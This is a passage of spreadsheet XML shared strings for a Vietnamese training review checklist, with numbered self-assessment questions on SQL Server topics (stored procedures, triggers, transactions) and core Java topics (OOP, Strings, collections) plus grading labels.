        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI103</t>
  </si>
  <si>
    <t>Thực hành sử dụng CTE?</t>
  </si>
  <si>
    <t>SI104</t>
  </si>
  <si>
    <t>Đã hiểu về các hàm Ranking?</t>
  </si>
  <si>
    <t>SI105</t>
  </si>
  <si>
    <t>Thực hành paging với Row_Number()</t>
  </si>
  <si>
    <t>SI106</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Có hiểu biết về SQL Language Elements trong SQL Sever</t>
    </r>
  </si>
  <si>
    <t>SQL Language Elements</t>
  </si>
  <si>
    <t>Biết cách comment trong SQL sever?</t>
  </si>
  <si>
    <t>SI107</t>
  </si>
  <si>
    <t>Nắm được quy tắc đặt tên định danh (bảng, biến, hàm, thủ thục, ..) trong SQL?</t>
  </si>
  <si>
    <t>SI108</t>
  </si>
  <si>
    <t>Có thể khai báo biến (Varriables) trong SQL?</t>
  </si>
  <si>
    <t>SI109</t>
  </si>
  <si>
    <t>Đã hiểu về Control - of - flow trong SQL Sever?</t>
  </si>
  <si>
    <t>SI110</t>
  </si>
  <si>
    <t>Có thể sử dụng các lệnh IF, WHILE?</t>
  </si>
  <si>
    <t>SI111</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành :</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Stored Procedure
+ Trigger trong SQL
+ Function trong SQL</t>
    </r>
  </si>
  <si>
    <t>DB Objects</t>
  </si>
  <si>
    <t>Đã hiểu về User Store Procedure (USP)?</t>
  </si>
  <si>
    <t>SI112</t>
  </si>
  <si>
    <t>Hiểu được lợi ích của việc dùng Store Procedure ?</t>
  </si>
  <si>
    <t>SI113</t>
  </si>
  <si>
    <t>Có thể lấy giá trị trả về khi sử dụng Stored Procedure?</t>
  </si>
  <si>
    <t>SI114</t>
  </si>
  <si>
    <t>Đã thực hành sử dụng Stored Procedure?</t>
  </si>
  <si>
    <t>SI115</t>
  </si>
  <si>
    <t>Đã hiểu về User Defined-Function?</t>
  </si>
  <si>
    <t>SI116</t>
  </si>
  <si>
    <t>How many type of UDF ?</t>
  </si>
  <si>
    <t>SI117</t>
  </si>
  <si>
    <t>Thực hành sử dụng function User Scalar-valued Function?</t>
  </si>
  <si>
    <t>SI118</t>
  </si>
  <si>
    <t>Thực hành sử dụng function User Table-valued Function?</t>
  </si>
  <si>
    <t>SI119</t>
  </si>
  <si>
    <t>Điểm khác nhau giữa User Store Procedure và User Defined-Functions</t>
  </si>
  <si>
    <t>SI120</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu được </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>TRIGGER</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> là gì ?</t>
    </r>
  </si>
  <si>
    <t>SI121</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu khi nào sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>TRIGGER</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI122</t>
  </si>
  <si>
    <t>How many type of trigger ?</t>
  </si>
  <si>
    <t>SI123</t>
  </si>
  <si>
    <t>Hiểu về 2 bảng inserted và deleted?</t>
  </si>
  <si>
    <t>SI124</t>
  </si>
  <si>
    <t>Thực hành sử dụnd AFTER TRIGGER?</t>
  </si>
  <si>
    <t>SI125</t>
  </si>
  <si>
    <t>Thực hành sử dụng INSTEAD OF TRIGGER?</t>
  </si>
  <si>
    <t>SI126</t>
  </si>
  <si>
    <t>Có thể disable và enable một trigger?</t>
  </si>
  <si>
    <t>SI127</t>
  </si>
  <si>
    <t>So sánh Trigger và Stored procedures?</t>
  </si>
  <si>
    <t>SI128</t>
  </si>
  <si>
    <t>Đã hiểu về Transaction?</t>
  </si>
  <si>
    <t>SI129</t>
  </si>
  <si>
    <t>Tại sao phải sử dụng transaction ?</t>
  </si>
  <si>
    <t>SI130</t>
  </si>
  <si>
    <t>Đã thực hành sử dụng Transaction?</t>
  </si>
  <si>
    <t>SI131</t>
  </si>
  <si>
    <t>Giải thích được khái niệm ACID?</t>
  </si>
  <si>
    <t>SI132</t>
  </si>
  <si>
    <t>Câu hỏi khác</t>
  </si>
  <si>
    <t>SI133</t>
  </si>
  <si>
    <t>SI134</t>
  </si>
  <si>
    <t>SI135</t>
  </si>
  <si>
    <t>SI136</t>
  </si>
  <si>
    <t>SI137</t>
  </si>
  <si>
    <t>SI138</t>
  </si>
  <si>
    <t>SI139</t>
  </si>
  <si>
    <t>Trainee Assesment</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Questions</t>
  </si>
  <si>
    <t>Trainer Assesment</t>
  </si>
  <si>
    <t>P1</t>
  </si>
  <si>
    <t>Rank</t>
  </si>
  <si>
    <t>E</t>
  </si>
  <si>
    <t>D</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>&lt;&lt;Java Review Checklist&gt;&gt;</t>
  </si>
  <si>
    <t>JI001</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Hiểu về JRE, JDK, JVM
+ Có thể cài đặt JDK và JRE
</t>
    </r>
  </si>
  <si>
    <t>Java introduction</t>
  </si>
  <si>
    <t>Hiểu khái niệm "viết một lần chạy nhiều nơi" trong java?</t>
  </si>
  <si>
    <t>JI002</t>
  </si>
  <si>
    <t>Hiểu về lịch sử phát triển, các phiên bản Java?</t>
  </si>
  <si>
    <t>JI003</t>
  </si>
  <si>
    <t>Có thể cài đặt JDK?</t>
  </si>
  <si>
    <t>JI004</t>
  </si>
  <si>
    <t>So sánh giữa JRE và JDK?</t>
  </si>
  <si>
    <t>JI005</t>
  </si>
  <si>
    <t>Có thể cấu hình các biến môi trường CLASS_PATH, JAVA_HOME?</t>
  </si>
  <si>
    <t>JI006</t>
  </si>
  <si>
    <t>Hiểu khái niệm JMV?</t>
  </si>
  <si>
    <t>JI007</t>
  </si>
  <si>
    <t>Hiểu cơ chế biên dịch và thông dịch chương trình java?</t>
  </si>
  <si>
    <t>JI008</t>
  </si>
  <si>
    <t>Hiểu khái niệm Garbage Collection và cơ chế làm việc?</t>
  </si>
  <si>
    <t>JI009</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Các kiểu dữ liệu
+ Autoboxing và Unboxing
+ Từ khóa trong java
+ Toán tử gán, so sánh
+ Toán tử toán học
+ Toán tử instanceof
+ Câu lệnh lập trình: if, for, do..while, switch..case
+ Break/Continue
+ Array</t>
    </r>
  </si>
  <si>
    <t>Basic Java</t>
  </si>
  <si>
    <t>Nắm được các từ khóa (keyword) trong java?</t>
  </si>
  <si>
    <t>JI010</t>
  </si>
  <si>
    <t>Nắm được quy tắc đặt tên class, object, variable, method (naming convention)?</t>
  </si>
  <si>
    <t>JI011</t>
  </si>
  <si>
    <t>Nắm được về các kiểu nguyên thủy trong java (Primitive Data Types)?</t>
  </si>
  <si>
    <t>JI012</t>
  </si>
  <si>
    <t>So sánh kiểu nguyên thủy và kiểu đối tượng?</t>
  </si>
  <si>
    <t>JI013</t>
  </si>
  <si>
    <t>So sánh sự khác nhau giữa int vs Integer?</t>
  </si>
  <si>
    <t>JI014</t>
  </si>
  <si>
    <t>Hiểu khái niệm Autoboxing và Unboxing?</t>
  </si>
  <si>
    <t>JI015</t>
  </si>
  <si>
    <t>Thực hành Autoboxing và Unboxing?</t>
  </si>
  <si>
    <t>JI016</t>
  </si>
  <si>
    <t>Hiểu các toán tử (toán tử gán, so sánh) trong java?</t>
  </si>
  <si>
    <t>JI017</t>
  </si>
  <si>
    <t>Đã thực hành sử dụng toán tử gán, so sánh?</t>
  </si>
  <si>
    <t>JI018</t>
  </si>
  <si>
    <t>Hiểu toán tử toán học trong java?</t>
  </si>
  <si>
    <t>JI019</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu toán tử </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>"instanceof"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> trong java?</t>
    </r>
  </si>
  <si>
    <t>JI020</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành toán tử </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>"instanceof"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> trong java?</t>
    </r>
  </si>
  <si>
    <t>JI021</t>
  </si>
  <si>
    <t>Hiểu mục đích các câu lệnh điểu khiển chương trinh (Flow Controls)?</t>
  </si>
  <si>
    <t>JI022</t>
  </si>
  <si>
    <t>Thực hành câu lệnh if, for, while, do..while, switch..case?</t>
  </si>
  <si>
    <t>JI023</t>
  </si>
  <si>
    <t>Hiểu và thực hành về break, continue?</t>
  </si>
  <si>
    <t>JI024</t>
  </si>
  <si>
    <t>Hiểu về đặc điểm của mảng tĩnh (array) trong java?</t>
  </si>
  <si>
    <t>JI025</t>
  </si>
  <si>
    <t>Đã thực hành khai báo và sử dụng mảng tĩnh với kiểu nguyên thủy?</t>
  </si>
  <si>
    <t>JI026</t>
  </si>
  <si>
    <t>Đã thực hành khai báo và sử dụng mảng tĩnh với kiểu đối tượng?</t>
  </si>
  <si>
    <t>JI027</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Stack và Heap memory</t>
    </r>
  </si>
  <si>
    <t>Memory</t>
  </si>
  <si>
    <t>Hiểu về Java Memory?</t>
  </si>
  <si>
    <t>JI028</t>
  </si>
  <si>
    <t>So sánh được bộ nhớ Stack và Heap?</t>
  </si>
  <si>
    <t>JI029</t>
  </si>
  <si>
    <t>Hiểu về memory leak, cách khắc phục?</t>
  </si>
  <si>
    <t>JI030</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Class, Object, Constructor, attribute, method
+ Access Modifiers (private, [default], protected, public?
+ Inheritance: is-a, has-a
+ Abstraction: abstract class vs interface
+ Polymorphims: override vs overload
+ Encapsulation</t>
    </r>
  </si>
  <si>
    <t>OOP</t>
  </si>
  <si>
    <t>Học viên đã nắm được khái niệm class, object trong Java chưa?</t>
  </si>
  <si>
    <t>JI031</t>
  </si>
  <si>
    <t>Học viên đã thực hành viết code sử dụng class, object trong java chưa?</t>
  </si>
  <si>
    <t>JI032</t>
  </si>
  <si>
    <t>Hiểu khái niệm và cách sử dụng Constructor trong java?</t>
  </si>
  <si>
    <t>JI033</t>
  </si>
  <si>
    <t>Thực hành sử dụng Constructor?</t>
  </si>
  <si>
    <t>JI034</t>
  </si>
  <si>
    <t>Hiểu về nạp chồng constructor?</t>
  </si>
  <si>
    <t>JI035</t>
  </si>
  <si>
    <t>Thực hành nạp chồng (overload) constructor?</t>
  </si>
  <si>
    <t>JI036</t>
  </si>
  <si>
    <t>Hiểu khái niệm attribute và method?</t>
  </si>
  <si>
    <t>JI037</t>
  </si>
  <si>
    <t>Thực hành sử dụng attribute và method?</t>
  </si>
  <si>
    <t>JI038</t>
  </si>
  <si>
    <t>Nắm được các loại Access Modifiers?</t>
  </si>
  <si>
    <t>JI039</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng tất cả Access Modifiers </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>(private,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> [default], </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>protected,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>public?</t>
    </r>
  </si>
  <si>
    <t>JI040</t>
  </si>
  <si>
    <t>Nắm được về tính chất Inheritance?</t>
  </si>
  <si>
    <t>JI041</t>
  </si>
  <si>
    <t>Đã cài đặt Inheritance trong java?</t>
  </si>
  <si>
    <t>JI042</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Hiểu về khái niệm "</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>is-a</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>"?</t>
    </r>
  </si>
  <si>
    <t>JI043</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>So sánh "</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>is-a</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>" và "</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>has-a</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>" trong Java?</t>
    </r>
  </si>
  <si>
    <t>JI044</t>
  </si>
  <si>
    <t>Nắm được tính chất Abstraction?</t>
  </si>
  <si>
    <t>JI045</t>
  </si>
  <si>
    <t>Cài đặt abstract class trong java?</t>
  </si>
  <si>
    <t>JI046</t>
  </si>
  <si>
    <t>Cài đặt interface trong java?</t>
  </si>
  <si>
    <t>JI047</t>
  </si>
  <si>
    <t>So sánh sự giống và khác nhau giữa abstract class và interface?</t>
  </si>
  <si>
    <t>JI048</t>
  </si>
  <si>
    <t>Hiểu về đa kế thừa class?</t>
  </si>
  <si>
    <t>JI049</t>
  </si>
  <si>
    <t>Hiểu về đa kế thừa giữa class và interface?</t>
  </si>
  <si>
    <t>JI050</t>
  </si>
  <si>
    <t>Hiểu về đa kế thừa interface?</t>
  </si>
  <si>
    <t>JI051</t>
  </si>
  <si>
    <t>Nắm được tính chất Encapsulation?</t>
  </si>
  <si>
    <t>JI052</t>
  </si>
  <si>
    <t>Cài đặt Encapsulation trong Java?</t>
  </si>
  <si>
    <t>JI053</t>
  </si>
  <si>
    <t>Hiểu được tính chất Polymorphism?</t>
  </si>
  <si>
    <t>JI054</t>
  </si>
  <si>
    <t>Cài đặt override trong Java?</t>
  </si>
  <si>
    <t>JI055</t>
  </si>
  <si>
    <t>Cài đặt overload trong Java?</t>
  </si>
  <si>
    <t>JI056</t>
  </si>
  <si>
    <t>So sánh sự khác nhau giữa 2 kỹ thuật Overloading vs Overriding trong Java?</t>
  </si>
  <si>
    <t>JI057</t>
  </si>
  <si>
    <t>Hiểu về cơ chế thay đổi access modifier trong kỹ thuật Overloading?</t>
  </si>
  <si>
    <t>JI058</t>
  </si>
  <si>
    <t>Hiểu về cơ chế thay đổi access modifier trong kỹ thuật Overriding?</t>
  </si>
  <si>
    <t>JI059</t>
  </si>
  <si>
    <t>Hiểu về cơ chế thay đổi kiểu trả về trong kỹ thuật Overloading?</t>
  </si>
  <si>
    <t>JI060</t>
  </si>
  <si>
    <t>Hiểu về cơ chế thay đổi kiểu trả về trong kỹ thuật Overriding?</t>
  </si>
  <si>
    <t>JI061</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ static
+ final</t>
    </r>
  </si>
  <si>
    <t>static/final</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu ý nghĩa và mục đích sử dụng từ khóa </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>"static"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> trong java?</t>
    </r>
  </si>
  <si>
    <t>JI062</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>"static"?</t>
    </r>
  </si>
  <si>
    <t>JI063</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu ý nghĩa và mục đích sử dụng từ khóa </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>"final"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> trong java?</t>
    </r>
  </si>
  <si>
    <t>JI064</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>"final"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>JI065</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ String pool
+ String imutable
+ StringBuilder/StringBuffer</t>
    </r>
  </si>
  <si>
    <t>String/StringBuilder
/StringBuffer</t>
  </si>
  <si>
    <t>Hiểu khái niệm String Imutable?</t>
  </si>
  <si>
    <t>JI066</t>
  </si>
  <si>
    <t>Thực hành sử dụng String Imuatble?</t>
  </si>
  <si>
    <t>JI067</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Nắm được các phương thức cơ bản của </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>String?</t>
    </r>
  </si>
  <si>
    <t>JI068</t>
  </si>
  <si>
    <t>Thực hành thuật toán đảo ngược chuỗi?</t>
  </si>
  <si>
    <t>JI069</t>
  </si>
  <si>
    <t>Hiểu khái niệm String Pool?</t>
  </si>
  <si>
    <t>JI070</t>
  </si>
  <si>
    <t>Thực hành sử dụng String Pool?</t>
  </si>
  <si>
    <t>JI071</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu về 2 lớp </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>StringBuilder</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> và </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>StringBuffer?</t>
    </r>
  </si>
  <si>
    <t>JI072</t>
  </si>
  <si>
    <t>Thực hành sử dụng StringBuilder và StringBuffer?</t>
  </si>
  <si>
    <t>JI073</t>
  </si>
  <si>
    <t>Nắm được sự giống và khác nhau giữa StringBuilder và StringBuffer trong Java?</t>
  </si>
  <si>
    <t>JI074</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ List: ArrayList, Vector, LinkedList
+ Set: HashSet, TreeSet, LinkedHashSet
+ Map: HashMap, TreeMap, LinkedHashMap
+ Iterator, Enumeration
</t>
    </r>
  </si>
  <si>
    <t>List collection</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu về đặc điểm interface </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>List?</t>
    </r>
  </si>
  <si>
    <t>JI075</t>
  </si>
  <si>
    <t>Các lớp con của List?</t>
  </si>
  <si>
    <t>JI076</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>ArrayList,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Vector,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>LinkedList?</t>
    </r>
  </si>
  <si>
    <t>JI077</t>
  </si>
  <si>
    <t>So sánh sự giống và khác nhau giữa  ArrayList, Vector, LinkedList?</t>
  </si>
  <si>
    <t>JI078</t>
  </si>
  <si>
    <t>So sánh sự khác nhau giữa array (mảng tĩnh) và ArrayList?</t>
  </si>
  <si>
    <t>JI079</t>
  </si>
  <si>
    <t>Hiểu mục đích của  Comparable?</t>
  </si>
  <si>
    <t>JI080</t>
  </si>
  <si>
    <t>Thực hành sử dụng Comparable?</t>
  </si>
  <si>
    <t>JI081</t>
  </si>
  <si>
    <t>Hiểu mục đích của  Comparator?</t>
  </si>
  <si>
    <t>JI082</t>
  </si>
  <si>
    <t>Thực hành sử dụng  Comparator?</t>
  </si>
  <si>
    <t>JI083</t>
  </si>
  <si>
    <t>Nắm được sự khác nhau giữa  Comparator and Comparable?</t>
  </si>
  <si>
    <t>JI084</t>
  </si>
  <si>
    <t>Hiểu về sắp xếp dữ liệu trong List?</t>
  </si>
  <si>
    <t>JI085</t>
  </si>
  <si>
    <t>Thực hành sắp xếp dữ liệu trong List, dữ liệu wrapper class và object?</t>
  </si>
  <si>
    <t>JI086</t>
  </si>
  <si>
    <t>Set collection</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu về đặc điểm interface </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Set</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>JI087</t>
  </si>
  <si>
    <t>Các lớp con của Set?</t>
  </si>
  <si>
    <t>JI088</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>TreeSet,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>HashSet,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
